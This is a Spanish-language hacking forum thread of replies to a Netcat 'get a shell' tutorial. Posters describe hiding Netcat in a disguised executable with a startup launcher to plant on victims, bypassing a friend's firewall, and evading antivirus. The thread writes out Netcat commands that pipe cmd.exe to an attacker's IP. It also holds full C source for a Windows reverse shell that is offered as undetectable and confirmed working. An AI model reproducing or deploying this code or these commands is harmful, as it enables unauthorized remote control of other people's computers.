 Autor
|
Tema: Paper: Obtener shell con Netcat (Leído 56532 veces)
|
Rey11
 Desconectado
Mensajes: 3.218
¡¡VIVA ESPAÑA!!
|
Este tutorial es buenísimo gracias a el he aprendido a usar netcat, e repasado mucho de ms-dos, y desacerme un poco de la vista bonita de los troyanos, haciendo lo siguiente.
Empaqueto todo en un exe con:
Un notificador por irc, hecho por mi.
Un programa en vb, para ejecutar los demás programas al iniciar windows y arrancar el netcat oculto.
Tercero el netcat, todo con un icono muy bonito.
Además transfiero ficheros gracias al tftp es entretenidísimo y es mil veces mas facil de meter que un troyano. Muchísimas gracias a quien escribio este tutorial
Un saludo de Reydelmundo
|
|
|
|
|
En línea
|
Unete a la campaña contra educación para la ciudadanía: |
|
|
tylerdurden
Desconectado
Mensajes: 27
|
perdone por introducir esta duda...
yo ejecuto todo lo comentado en el manual para saltarme el firewill de un amigo
es decir
nc -vv -l -p 80 y nc -vv -l -p 25
y luego
nc -d -e ipvictima 80 | cmd.exe | nc -d -e ipvictima 25
lo pongo asi y lo ejecuto pero en la ventana de ms dos dd
pongo la linea anterior no me hace nada...vuelve a nc::
mientras k en las ventanas de nc -vv -l -p 80 y 25 se kedan a la espera
puede ser pork la makina victima no tenga instalado en netcat???
gracias de antemano
|
|
|
|
|
En línea
|
|
|
|
|
zhyzura
|
recuerda que tienes que especificar la ruta del nc en caso de que no lo hayas colocado dentro de system32. y... nc -d -e ipvictima 80 | cmd.exe | nc -d -e ipvictima 25 debe de ser la ip del atacante |
|
|
|
|
En línea
|
- - -->> Sie urteilen zu uns seiend unterschiedlich <<-- - - unser Durst des
Wissens ist unersättlich |
|
|
tylerdurden
Desconectado
Mensajes: 27
|
pero la orden esa ultima ,es decir (ip atacante)
nc -d -e ipatacante 80 | cmd.exe | nc -d -e ipatacante 25
se tiene k ejecutar desde la makina victima no???
y para ello habria k meterle un troyano o algo
lo suyo seria poder ejectuarlo desde la makina atacante
gracias
|
|
|
|
|
En línea
|
|
|
|
noiky
Desconectado
Mensajes: 22
|
Ya domino usar el netcat para crear una shell teniendo acceso fisico pero no se donde buscar como hacerlo sin tener un acceso fisico..... me ayudais? ???
|
|
|
|
|
En línea
|
|
|
|
kicking people
Desconectado
Mensajes: 210
|
lo de conectar con el puerto 80 y 25 no me funciona
mando las ordenes por el 80 y por el 25 ni conecta
no hace nada
|
|
|
|
|
En línea
|
|
|
|
fanky10
Desconectado
Mensajes: 11
|
Un simple detalle.... NO ANDA EL LINK!!!! :@ si alguien puede ser tan amable de decirme un nuevo link o simplemente mandarmelo x mail a fanky10@yahoo.com.ar voy a agradeserselo!!! desde ya muchas gracias Fanky10 |
|
|
|
|
En línea
|
|
|
|
|
zhyzura
|
@ noiky
una manera seria buscando vulnerabilidades y utilizando exploits.
para esto date una vuelta por el foro de bugs y exploits.
@ kicking people
esto se puede deber a que tiene algun servicio la victima corriendo en ese puerto, lo que tienes que hacer es matarlo antes de intentar conectar.
@fanky10
vuelve a intentarlo, ya funciona perfectamente.
|
|
|
|
|
En línea
|
- - -->> Sie urteilen zu uns seiend unterschiedlich <<-- - - unser Durst des
Wissens ist unersättlich |
|
|
fanky10
Desconectado
Mensajes: 11
|
mi problema es q mi acrobat reader NO lee los putisimos archivos, ya sean estos o el tutorial de hacking win2000 por gospel :@
desde ya muchas gracias
fanky10
|
|
|
|
|
En línea
|
|
|
|
noiky
Desconectado
Mensajes: 22
|
@ noiky
una manera seria buscando vulnerabilidades y utilizando exploits.
para esto date una vuelta por el foro de bugs y exploits.
gracias |
|
|
|
|
En línea
|
|
|
|
ulis3s
Desconectado
Mensajes: 2
|
Muy buen tutorial zhyzura, pero el problema que yo le veo al netcat es que me lo detecta el antivirus y además el firewall que uso proteje tambien las conexiones salientes y le pregunta al usuario si autoriza la conexión  (tanto para el puerto 25 como para el 80). Es posible saltarse estas protecciones?? y si es asi como hacerlo? |
|
|
|
|
En línea
|
|
|
|
mousehack
Desconectado
Mensajes: 1.146
Ex-Colaborador....!!!!!!XD
|
leyendo otros foros  se posteo una shell reverse para win, que aseguran es indetectable.la posteo aqui para probarla: /*
Reverse shell for Windows. Works
without creating pipes by passing
a socket as the in/out pipe to
the child process (cmd.exe)
Written in C by Kyro5
Compile:
Just be sure to link against libWs2_32.a
Use:
Setup a listening port on your box, default=6789.
Example using Netcat:
...> nc -vvv -l -p 6789
then run me.
*/
#include <stdio.h>
#include <windows.h>
#include <winsock2.h>
int main() {
char cmdpath[MAX_PATH];
struct sockaddr_in sin;
WSADATA wd;
int sock;
PROCESS_INFORMATION proc;
STARTUPINFO startup;
/* Setup socket. */
puts("[*] Initializing...");
memset(&sin, 0, sizeof(sin));
WSAStartup(MAKEWORD(1, 1), &wd);
sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
sin.sin_family = AF_INET;
sin.sin_port = htons(22);
// sin.sin_addr.s_addr = inet_addr("127.0.0.1");
sin.sin_addr.s_addr = inet_addr("192.168.0.1");
/* Connect to the h4x0r. */
for(;; ) {
puts("[*] Attempting to connect to 127.0.0.1:6789...");
if (!connect(sock, (struct sockaddr*)&sin, sizeof(sin))) break;
}
/* Start the shell. */
puts("[*] Spawning shell...");
GetEnvironmentVariable("COMSPEC", cmdpath, MAX_PATH);
ZeroMemory(&startup, sizeof(STARTUPINFO));
startup.cb = sizeof(STARTUPINFO);
startup.dwFlags = STARTF_USESTDHANDLES;
/* startup.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
startup.wShowWindow = SW_HIDE; */
startup.hStdInput = startup.hStdOutput = startup.hStdError = (HANDLE)sock;
if (!CreateProcess(0, cmdpath, 0, 0, 1, 0, 0, 0, &startup, &proc))
puts("Unable to create process! Kill yourself.");
puts("[*] I hang here.. why?");
return 0;
}
Salu2 |
|
|
|
|
En línea
|
|
|
|
|
zhyzura
|
gracias por la info, mañana me pongo en ello |
|
|
|
|
En línea
|
- - -->> Sie urteilen zu uns seiend unterschiedlich <<-- - - unser Durst des
Wissens ist unersättlich |
|
|
SeniorX
Desconectado
Mensajes: 1.325
Programador Novato
|
Hola a todos, bueno le di una mirada al manual y está muy bueno, me baje el pdf pero viene protegido para imprimirlo, estuve buscando programas para hackear el archivo pero encontre de todo menos eso.... alguien me ayuda porfavor? porque yo me bajo los manuales, los leo durante la semana, muchas gracias.
|
|
|
|
|
En línea
|
try {
live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
} Precaución: La programacion puede producir adiccion |
|
|
|
zhyzura
|
creo que eso si se me fue de la mano xD
mañana lo pongo en mi host para que lo bajes y puedas imprimir.
zaludox
P.D. el archivo de la reverse shell lo prove y despues de varias pruebas me funciono.
|
|
|
|
|
En línea
|
- - -->> Sie urteilen zu uns seiend unterschiedlich <<-- - - unser Durst des
Wissens ist unersättlich |
|
|
|
 |
